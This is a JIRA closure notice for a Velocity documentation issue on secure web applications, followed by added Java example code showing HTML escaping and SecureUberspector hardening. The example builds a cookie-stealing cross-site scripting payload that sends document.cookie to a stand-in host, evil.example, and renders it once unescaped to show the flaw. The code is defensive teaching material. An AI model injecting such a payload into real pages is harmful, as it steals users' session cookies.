[ https://issues.apache.org/jira/browse/VELOCITY-184?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]
Henning Schmiedehausen closed VELOCITY-184.
-------------------------------------------
> new document: "Building a Robust and Secure Web Application With Velocity"
> --------------------------------------------------------------------------
>
> Key: VELOCITY-184
> URL: https://issues.apache.org/jira/browse/VELOCITY-184
> Project: Velocity
> Issue Type: Bug
> Components: Documentation
> Affects Versions: 1.0-Release
> Environment: Operating System: other
> Platform: Other
> Reporter: Will Glass-Husain
> Assigned To: Velocity-Dev List
> Attachments: security.xml
>
>
> Any time you build a web application, it is your responsibility as a web
> developer to ensure that the application does what it is supposed to do, fails
> gracefully in case of an error, keeps users from gaining access to data they
> are not supposed to view, and prevents malicious users from interfering with
> the operation of the application.
> While a detailed discussion of how to build a robust web application is an
> overly complex topic, this short paper touches on several issues that are
> common in a Velocity-based web application. The paper is written from the
> perspective of a Velocity developer, who interacts with a group of HTML
> template designers and a larger pool of end users.
> Topics
> 1) How Velocity Helps the Developer Create a Robust App
> 2) Velocity-Specific Issues Regarding Robustness and Security
> 3) Best Practices In Building A Secure, Robust Velocity Web Application
> a) Review all context references for unwanted methods.
> b) Encode HTML special characters to avoid cross-site scripting vulnerabilities.
> c) Use an up-to-date and properly configured app server.
> d) Configure Velocity for production use.
> 4) Working with Untrusted HTML Template Designers
--
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.
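Added illustration of outline items 3a and 3b above (review context references for unwanted methods; HTML-encode references to avoid cross-site scripting). This is example code written for this page, not code from VELOCITY-184, the attached security.xml, or the Velocity project. It assumes Velocity 1.5 or later, which ships the EscapeHtmlReference event handler and the SecureUberspector; the UserView class, the template string and the hostile input are constructed for the example.

```java
// Added example (not from VELOCITY-184 or its attachment). Assumes Velocity 1.5+,
// where org.apache.velocity.app.event.implement.EscapeHtmlReference and
// org.apache.velocity.util.introspection.SecureUberspector exist. UserView, the
// template and the hostile display name are constructed for this example.
import java.io.StringWriter;
import org.apache.velocity.VelocityContext;
import org.apache.velocity.app.VelocityEngine;

public class VelocitySecurityExample {

    // 3a: put a narrow view object in the context instead of the domain object.
    // Every public method of whatever sits in the context is callable from a
    // template, so a raw entity would expose its setters, and on older versions
    // calls such as $user.getClass() as well. This wrapper exposes one getter.
    public static final class UserView {
        private final String displayName;
        public UserView(String displayName) { this.displayName = displayName; }
        public String getDisplayName() { return displayName; }
    }

    private static VelocityEngine newEngine(boolean hardened) throws Exception {
        VelocityEngine ve = new VelocityEngine();
        if (hardened) {
            // 3b: HTML-encode each $reference at insertion time, so template
            // designers cannot forget to escape user-controlled values.
            ve.setProperty("eventhandler.referenceinsertion.class",
                "org.apache.velocity.app.event.implement.EscapeHtmlReference");
            // 3a, defence in depth: refuse reflection-style method calls from
            // templates (getClass(), getClassLoader() and similar).
            ve.setProperty("runtime.introspector.uberspect",
                "org.apache.velocity.util.introspection.SecureUberspector");
        }
        ve.init();
        return ve;
    }

    // Renders an inline template against a context holding one "user" entry.
    public static String render(boolean hardened, String template, Object user)
            throws Exception {
        VelocityEngine ve = newEngine(hardened);
        VelocityContext ctx = new VelocityContext();
        ctx.put("user", user);
        StringWriter out = new StringWriter();
        ve.evaluate(ctx, out, "example", template);
        return out.toString();
    }

    public static void main(String[] args) throws Exception {
        // Constructed attacker-controlled value, e.g. a display name submitted
        // through a profile form and later rendered for other users.
        String hostile = "<script>document.location='http://evil.example/?c='"
                       + "+document.cookie</script>";
        String template = "<p>Welcome, $user.displayName</p>";

        // Unhardened engine: the raw string reaches the browser unchanged (XSS).
        System.out.println(render(false, template, new UserView(hostile)));

        // Hardened engine: EscapeHtmlReference rewrites < > & " as entities, so
        // the same template emits inert text.
        System.out.println(render(true, template, new UserView(hostile)));
    }
}
```

EscapeHtmlReference applies to every reference by default; if some references must emit markup deliberately, restrict it with the eventhandler.escape.html.match regular-expression property rather than disabling the handler. The SecureUberspector is not a substitute for item 3a: it blocks a known set of reflective calls, but any other public method on a context object remains callable, so the wrapper class is what actually limits what a template designer can reach.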